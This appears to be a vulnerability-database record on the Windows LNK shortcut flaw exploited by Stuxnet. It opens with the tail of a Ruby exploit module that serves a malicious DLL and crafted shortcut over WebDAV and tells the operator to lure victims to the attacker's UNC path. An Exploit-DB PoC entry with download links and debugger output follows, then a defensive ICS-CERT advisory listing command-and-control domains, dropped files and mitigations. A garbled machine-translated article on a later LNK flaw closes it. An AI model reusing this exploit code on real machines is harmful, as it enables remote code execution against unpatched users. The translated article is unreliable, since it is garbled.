'text/html'\r\n\t\t\t\tcli.send_response(resp)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tprint_status(\"Sending directory multistatus for #{path} ...\")\r\n\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n\t<D:response 
xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n\t\t<D:href>#{path}</D:href>\r\n\t\t<D:propstat>\r\n\t\t\t<D:prop>\r\n\t\t\t\t<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n\t\t\t\t<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n\t\t\t\t<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n\t\t\t\t<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n\t\t\t\t<D:supportedlock>\r\n\t\t\t\t\t<D:lockentry>\r\n\t\t\t\t\t\t<D:lockscope><D:exclusive/></D:lockscope>\r\n\t\t\t\t\t\t<D:locktype><D:write/></D:locktype>\r\n\t\t\t\t\t</D:lockentry>\r\n\t\t\t\t\t<D:lockentry>\r\n\t\t\t\t\t\t<D:lockscope><D:shared/></D:lockscope>\r\n\t\t\t\t\t\t<D:locktype><D:write/></D:locktype>\r\n\t\t\t\t\t</D:lockentry>\r\n\t\t\t\t</D:supportedlock>\r\n\t\t\t\t<D:lockdiscovery/>\r\n\t\t\t\t<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n\t\t\t</D:prop>\r\n\t\t<D:status>HTTP/1.1 200 OK</D:status>\r\n\t</D:propstat>\r\n</D:response>\r\n|\r\n\r\n\r\n\t\tsubdirectory = %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\r\n\t\tfiles = %Q|\r\n<D:response xmlns:lp1=\"DAV:\" 
xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_dll}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_lnk}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>shortcut</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\t\tif request[\"Depth\"].to_i > 0\r\n\t\t\tif path.scan(\"/\").length < 2\r\n\t\t\t\tbody << subdirectory\r\n\t\t\telse\r\n\t\t\t\tbody << 
files\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tbody << \"</D:multistatus>\"\r\n\r\n\t\tbody.gsub!(/\\t/, '')\r\n\r\n\t\t# send the response\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = body\r\n\t\tresp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\tdef generate_link(unc)\r\n\t\tuni_unc = unc.unpack(\"C*\").pack(\"v*\")\r\n\t\tpath = ''\r\n\t\tpath << [\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\t].pack(\"C*\")\r\n\t\tpath << uni_unc\r\n\r\n\t\t# LinkHeader\r\n\t\tret = [\r\n\t\t\t0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\t].pack('C*')\r\n\r\n\t\tidlist_data = ''\r\n\t\tidlist_data << [0x12 + 2].pack('v')\r\n\t\tidlist_data << [\r\n\t\t\t0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n\t\t\t0x30, 0x9d\r\n\t\t].pack('C*')\r\n\t\tidlist_data << [0x12 + 2].pack('v')\r\n\t\tidlist_data << [\r\n\t\t\t0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n\t\t\t0x30, 0x9d\r\n\t\t].pack('C*')\r\n\t\tidlist_data << [path.length + 2].pack('v')\r\n\t\tidlist_data << path\r\n\t\tidlist_data << [0x00].pack('v') # TERMINAL WOO\r\n\r\n\t\t# LinkTargetIDList\r\n\t\tret << [idlist_data.length].pack('v') # IDListSize\r\n\t\tret << idlist_data\r\n\r\n\t\t# ExtraData blocks (none)\r\n\t\tret << [rand(4)].pack('V')\r\n\r\n\t\t# Patch in the LinkFlags\r\n\t\tret[0x14, 
4] = [\"10000001000000000000000000000000\".to_i(2)].pack('N')\r\n\t\tret\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tunc = \"\\\\\\\\\"\r\n\t\tif (datastore['UNCHOST'])\r\n\t\t\tunc << datastore['UNCHOST'].dup\r\n\t\telse\r\n\t\t\tunc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\r\n\t\tend\r\n\t\tunc << \"\\\\\"\r\n\t\tunc << rand_text_alpha(rand(8)+4)\r\n\t\tunc << \"\\\\\"\r\n\r\n\t\t@exploit_unc = unc\r\n\t\t@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\"\r\n\t\t@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\"\r\n\r\n\t\tif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n\t\t\traise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'\r\n\t\tend\r\n\r\n\t\tprint_status(\"\")\r\n\t\tprint_status(\"Send vulnerable clients to #{@exploit_unc}.\")\r\n\t\tprint_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\")\r\n\t\tprint_status(\"\")\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16574/"}, {"lastseen": "2016-02-01T19:47:39", "description": "Microsoft Windows Automatic LNK Shortcut File Code Execution. CVE-2010-2568,CVE-2015-0096. Local exploit for windows platform", "published": "2010-07-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Automatic LNK Shortcut File Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568", "CVE-2015-0096"], "modified": "2010-07-18T00:00:00", "id": "EDB-ID:14403", "href": "https://www.exploit-db.com/exploits/14403/", "sourceData": "From: http://www.ivanlef0u.tuxfamily.org/?p=411\r\n\r\n1. Unzip the files in 'C: \\'. Start a DbgView or paste a KD to your VM.\r\n2. Rename 'suckme.lnk_' to 'suckme.lnk' and let the magic do the rest of shell32.dll.\r\n3. Look at your logs. 
\r\n\r\nhttp://ivanlef0u.nibbles.fr/repo/suckme.rar\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14403.rar (suckme.rar)\r\n\r\nTested under XP SP3. \r\n\r\nkd> g\r\nBreakpoint 1 hit\r\neax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4\r\neip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nSHELL32!_LoadCPLModule+0x10d:\r\n001b:7ca78712 ff15a0159d7c call dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)}\r\nkd> dd esp\r\n00f5e9c4 00f5ee7c 000a27bc 00f5ee78 00000000\r\n00f5e9d4 00000020 00000008 00f5ee7c 00000000\r\n00f5e9e4 00000000 0000007b 00000000 00000000\r\n00f5e9f4 00200073 002000e0 0000064c 0000028c\r\n00f5ea04 1530000a 00000000 003a0043 0064005c\r\n00f5ea14 006c006c 0064002e 006c006c 006d002e\r\n00f5ea24 006e0061 00660069 00730065 00000074\r\n00f5ea34 00090608 7c92005d 00000000 00000007\r\nkd> db 00f5ee7c\r\n00f5ee7c 43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00 C.:.\\.d.l.l...d.\r\n00f5ee8c 6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02 l.l....|......r.\r\n00f5ee9c 4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00 K..........|....\r\n00f5eeac ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00 ...|0...4.......\r\n00f5eebc 9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00 ...|0.......P@..\r\n00f5eecc 50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00 P@.........|@...\r\n00f5eedc a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c ....A..|....]..|\r\n00f5eeec c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c ...............|\r\nkd> kv\r\nChildEBP RetAddr Args to Child\r\n00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])\r\n00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])\r\n00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])\r\n00f5f2b8 
7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])\r\n00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])\r\n00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])\r\n00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])\r\n00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])\r\n00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])\r\n00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])\r\n00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])\r\n00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])\r\n00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])\r\n00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])\r\n00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])\r\n00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])\r\n00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])\r\n00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])\r\n00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14403/"}], "ics": [{"lastseen": "2021-02-27T19:57:37", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "## Overview\n\nVirusBlokAda, an antivirus vendor based in Belarus, announceda the discovery of malware that uses a zero-day vulnerability in 
Microsoft Windows processing of shortcut files. The malware utilizes this zero-day vulnerability and exploits systems after users open a USB drive with a file manager capable of displaying icons (like Windows Explorer). US-CERT has released a Vulnerability Noteb detailing the vulnerability and suggested workarounds. Microsoft has also released a Security Advisory (2286198)c detailing the previously unknown vulnerability.\n\nICS-CERT has confirmed the malware installs a trojan that interacts with installed SIMATIC\u00ae WinCC or SIMATIC\u00ae Siemens STEP 7 software and then makes queries to any discovered SIMATIC\u00ae databases. The full capabilities of the malware and intent or results of the queries are not yet known.\n\nICS-CERT is coordinating with Siemens CERT, CERT/CC, Microsoft, and other groups both domestically\n\n## Affected Systems\n\nMicrosoft reports that the zero-day vulnerability affects the following versions of Windows:\n\n * Windows XP Service Pack 3\n * Windows XP Professional x64 Edition Service Pack 2\n * Windows Server 2003 Service Pack 2\n * Windows Server 2003 x64 Edition Service Pack 2\n * Windows Server 2003 with SP2 for Itanium-based Systems\n * Windows Vista Service Pack 1 and Windows Vista Service Pack 2\n * Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\n * Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\n * Windows 7 for 32-bit Systems\n * Windows 7 for x64-based Systems\n * Windows Server 2008 R2 for x64-based Systems\n * Windows Server 2008 R2 for Itanium-based Systems\n\nThere are also unconfirmed reports that Windows 2000 and Windows XP SP2 are also susceptible to this zero-day vulnerability.\n\nThe malware also appears to 
interact with SIMATIC\u00ae WinCC or SIMATIC\u00ae Siemens STEP 7 software. Exact software versions and configurations that may be affected are still being analyzed jointly by ICS-CERT and Siemens CERT.\n\n## Impact\n\nThe actual impact on control environments is not yet known. ICS-CERT is currently evaluating the malware to determine the potential effects that it could have on control system environments.\n\nOn July 18, 2010, proof-of-concept exploit code for the zero-day Windows vulnerability was publicly released.\n\n## Background\n\nSIMATIC\u00ae WinCC HMI is a scalable process-visualization system for monitoring automated processes.\n\nSIMATIC\u00ae STEP 7 is engineering software used in the programming and configuration of SIMATIC\u00ae programmable controllers.\n\nThese products are widely used in many critical infrastructure sectors.\n\n## Malware Characterization\n\n### Malware Details\n\nThe malware appears to launch when a USB storage device is viewed using a file manager such as Windows Explorer. Because the malware exploits a zero-day vulnerability in the way that Windows processes shortcut files, the malware is able to execute without using the AutoRun feature.\n\nShortcut files are Windows files that link easy-to-recognize icons to specific executable programs, and are typically placed on the user\u2019s Desktop or Start Menu. A shortcut will not execute until a user clicks on its icon. While Microsoft\u2019s advisory indicates users need to click an icon for the vulnerability to be executed, VirusBlokAda reports these malicious shortcut files are capable of executing automatically (without user interaction) if accessed by Windows Explorer.\n\nThis vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. 
For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.\n\nBased on current reporting,d the malware drops and executes two driver files: **mrxnet.sys **and mrxcls.sys. The mrxnet.sys driver works as a file system filter driver, and mrxcls.sys is used to inject malicious code. These files are placed in the %SystemRoot%\\System32\\drivers directory. The drivers were signed with the apparent digital signature of Realtek Semiconductor Corporation. No warning is displayed in Windows when the drivers are installed, even though the certificate used to sign the files expired in June 2010. VeriSign has revoked the certificate used to sign the malware. The two drivers are used to inject code into system processes to hide themselves. Using this method, the malware files are not visible on an infected USB storage device.\n\nCurrently, some analysis has been performed and published on the Siemens-specific capabilities of the malware. ICS-CERT has confirmed that the database query strings do in fact reference WinCC database tables containing Input/Output tags. As more details become available and analysis is verified, ICS-CERT will publish updates to this advisory.\n\nICS-CERT has found indications the malware checks for the presence of antivirus software. ICS-CERT recommends that system owners who think they have been compromised perform a check to ensure any installed antivirus software is still active as the malware may disable the software.\n\nSymantec has also performed some in-depth analysis of the Stuxnet malware files.e This information has not been independently verified by ICS-CERT but is included for reference.\n\n### Callback Domains/Command & Control\n\nIndependent analysis from multiple sourcesf ,g ,h ,i has identified the following domains as command and control domains associated with the malware. 
ICS-CERT has not independently verified these findings, but calls to these domains may indicate a compromise.\n\n * mypremierfutbol.com\n * todaysfutbol.com\n\nAdditionally, some sources are reporting that HTTP requests with the following content may be indicative of a compromised host:\n\n * \u201cindex.php?data=66a96e28\u201d\n\n### Installed Filesj\n\nC:\\WINDOWS\\system32\\drivers\\mrxnet.sys \nC:\\WINDOWS\\system32\\drivers\\mrxcls.sys \nC:\\WINDOWS\\inf\\oem7A.PNF \nC:\\WINDOWS\\inf\\oem6C.PNF \nC:\\WINDOWS\\inf\\mdmeric3.PNF \nC:\\WINDOWS\\inf\\mdmcpq3.PNF\n\n## Mitigation\n\nMicrosoft\u2019s Security Advisory (2286198)k provides workarounds to mitigate this previously unknown vulnerability being exploited by this malware:\n\n * Disable the displaying of icons for shortcuts\n * Disable the WebClient service\n\nMicrosoft has released an updated advisory that includes:\n\n * Information on an additional attack vector identified through the use of PIF files, which are very similar to LNK shortcuts.\n * Updated workarounds to reflect that the IconHandler also needs to be edited.\n * A new Fix It tool, which allows administrators and users to more easily deploy the workaround.\n * A workaround to block downloading of LNK and PIF files from the internet. 
These files cannot be renamed, but any blocking solution should take into account the WebDAV protocol, if the WebDAV client has not already been disabled;\n * Clarification of some of the possible attack vectors, including the use of an embedded shortcut in an Office document, or the use of a web browser to browse malicious content.\n\nOther suggested workarounds to help reduce the risks to this and other vulnerabilities include:\n\n * Disable AutoRun as described in Microsoft Support article [967715](<http://support.microsoft.com/kb/967715>).\n * Implement the principle of least privilege as defined in the [Microsoft TechNet Library](<http://technet.microsoft.com/en-us/library/bb456992.aspx>).\n * Maintain up-to-date antivirus software.\n\nSiemens has also released an [advisory ](<http://support.automation.siemens.com/WW/llisapi.dll?func=cslib.csinfo&lang=en&objid=43876783&caller=view>)to address questions surrounding this [issue](<http://support.automation.siemens.com/WW/llisapi.dll?func=cslib.csinfo&lang=en&objid=43876783&caller=view.>). Siemens has indicated that they have received one notification of an infection to an organization in Germany. The damage, if any, is unknown at this time.\n\n### **\\--------- Begin Update C \u2013 Part 1 of 2 ----------**\n\nSiemens indicates four customers have been infected worldwide with no impact to [production](<http://support.automation.siemens.com/WW/view/en/43876783>).\n\n### **\\---------- End Update C \u2013 Part 1 of 2 ----------**\n\nAntivirus vendorsl ,m have indicated the presence of a second Stuxnet variant. Most reports indicate the new rootkit driver is very similar to previously observed samples. 
The main difference noted has been the use of a certificate from JMicron Technology Corporation to digitally sign the driver.\n\n### Siemens Security Update\n\nSiemens has released a Security Update: SIMATIC_Security_Update_20100722.exe, which is available on their [support website](<http://support.automation.siemens.com/WW/view/en/43876783>).\n\nAccording to Siemens, the SIMATIC update accomplishes the following:\n\n * Modifies the registry settings according to Microsoft\u2019s Security Advisoryk version 1.2.\n * Adapts the SQL Server settings to the latest security settings. This step will make for stricter authentication controls.\n\nInstalling this SIMATIC update will replace all Siemens system icons with standard Windows icons. Siemens recommends meaningful names be assigned to desktop and Windows Start menu links so they may be easily recognized after the update.\n\nAdditionally, Siemens product support has provided a link to download a copy of Trend Micro System Cleaner (Sysclean) to assist users in detecting/cleaning infected systems.\n\nOwners and operators should exercise caution however, and consult their control systems vendor prior to making any changes. Proper impact analysis and testing should always be conducted prior to making any changes to control systems. Siemens CERT has indicated that they are performing testing on the mitigations to determine their possible effects on control systems.\n\nICS-CERT reminds users to exercise caution when using USB drives. For more information on best practices and removable media, see the ICS-CERT Control Systems Analysis Report \u201cUSB Drives Commonly Used As An Attack Vector Against Critical Infrastructure.\"\n\nMalware samples have been provided to the antivirus vendor community. ICS-CERT recommends consulting your antivirus and control systems vendor before scanning systems with current antivirus software. 
The malware is identified by some anti-virus vendors as the following:\n\n * Mcafee: Stuxnet\n * Kaspersky: Trojan-Dropper.Win32.Stuxnet.a\n * TrendMicro: WORM_STUXNET.A\n * Sophos: Troj/Stuxnet-A\n * Microsoft: TrojanDropper:Win32/Stuxnet.A\n * Panda: Trj/CI.A\n * DrWeb: Trojan.Stuxnet.1\n * Ikarus: Trojan-Dropper.Win32.Stuxnet\n * Norman: W32/Stuxnet.C\n * F-Secure: Exploit:W32/WormLink.A\n\nAs details of the malware become better known, further mitigation recommendations will be published. Please report any issues affecting control systems in critical infrastructure environments to ICS-CERT.\n\nOrganizations should follow their established internal procedures if any suspected malicious activity is observed, and report their findings to ICS\u2010CERT for tracking and correlation against other incidents. ICS\u2010CERT reminds organizations that proper impact analysis and risk assessment should be performed prior to taking defensive measures.\n\n### **\\--------- Begin Update C \u2013 Part 2 of 2 ----------**\n\nMicrosoft has released an [out-of-band security bulletin](<http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx>) on Monday, August 2, 2010 to address the vulnerability used by the Stuxnet malware to infect systems.\n\nThe Microsoft bulletin addresses a security vulnerability that exists in all supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. ICS-CERT recommends that all control systems operations personnel work with their vendor to assess potential impacts before implementing this new fix. 
ICS-CERT also recommends coordinating with your vendor to determine if the operating system provided in your control systems installation is affected by this vulnerability and if a fix is available.\n\n### **\\---------- End Update C \u2013 Part 2 of 2 ----------**\n\n * aVirusBlokAda, http://www.anti-virus.by/en/tempo.shtml, website last visited July 15, 2010.\n * bVulnerability Note, http://www.kb.cert.org/vuls/id/940193, website last visited July 16, 2010.\n * cMicrosoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010.\n * dVirusBlokAda, http://www.wilderssecurity.com/attachment.php?attachmentid=219888&d=1279012965, website last visited July 15, 2010.\n * eSymantec, http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components, last accessed July 22, 2010.\n * fZscaler Research, http://research.zscaler.com/2010/07/lnk-cve-2010-2568-stuxnet-incident.html, last accessed July 22, 2010.\n * gSiemens Forum, http://www.automation.siemens.com/WW/forum/guests/PostShow.aspx?PageIndex=1&PostID=225893&Language=en last accessed July 22, 2010.\n * hCERT-In, http://www.cert-in.org.in/virus/Stuxnet_Rootkit.htm, last accessed July 22, 2010.\n * iTrendMicro, http://threatinfo.trendmicro.com/vinfo/web_attacks/Worm%20Propagates%20via%20Windows%20Shortcut%20Vulnerability%20Exploit.html, last accessed July22, 2010\n * jVirusBlokAda, http://www.wilderssecurity.com/attachment.php?attachmentid=219888&d=1279012965, website last visited July 15, 2010.\n * kMicrosoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010.\n * lF-Secure, http://www.f-secure.com/weblog/archives/00001993.html, website last visited July 21, 2010.\n * mJeremy Kirk, http://www.infoworld.com/d/security-central/second-variant-stuxnet-worm-strikes-944?source=rss_infoworld_news, website last visited July 21, 2010.\n\n## \nContact Information\n\nFor any questions related to 
this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-10-201-01C>); we'd welcome your feedback.\n", "modified": "2014-01-08T00:00:00", "published": "2010-08-02T00:00:00", "id": "ICSA-10-201-01C", "href": "https://www.us-cert.gov/ics/advisories/ICSA-10-201-01C", "type": "ics", "title": "USB Malware Targeting Siemens Control Software (Update C)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-08-09T15:19:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-8464", "CVE-2107-8464", "CVE-2010-2568"], "edition": 1, "description": "Microsoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as the seismic network of the third generation, recently Metasploit published on the vulnerability of the PoC. 
[ This article is HanSight Han si original manuscript, for reprint please indicate the source\uff01] \nMicrosoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as\u201cearthquake network generation\u201d, recently Metasploit published on the vulnerability of the PoC. \nThe vulnerability principle is the same as 2010, the United States and Israel to invade and destroy Iran's nuclear facilities seismic network operations the use of penetrating nuclear isolation network Vulnerability, CVE-2010-2568 is very similar,\"it can easily be exploited by hackers to attack the infrastructure, storage of key information on core isolation system.\" \n\"When there is a vulnerability in the computer is plug in to save a vulnerable file of U disc, no need extra operation, exploits the program can perform and complete control of the user computer system\" is. \nVulnerability PoC demo: \n! [](/Article/UploadPic/2017-8/201789195027567. gif? www. myhack58. com) \nThe PoC for the LNK File format as shown below: \n! [](/Article/UploadPic/2017-8/201789195027829. png? www. myhack58. com) \nLNK File format the following figure \nTypically contains a Link to the file header, LinkTargetIDList, the error pop-UPS, And StringData and the extradata property of. \n! [](/Article/UploadPic/2017-8/201789195027941. jpg? www. myhack58. com) \nThe PoC relates to the important field, after the text will be explained. \nWant to trigger this vulnerability, LNK files must have the LinkTargetIDList and the extradata property 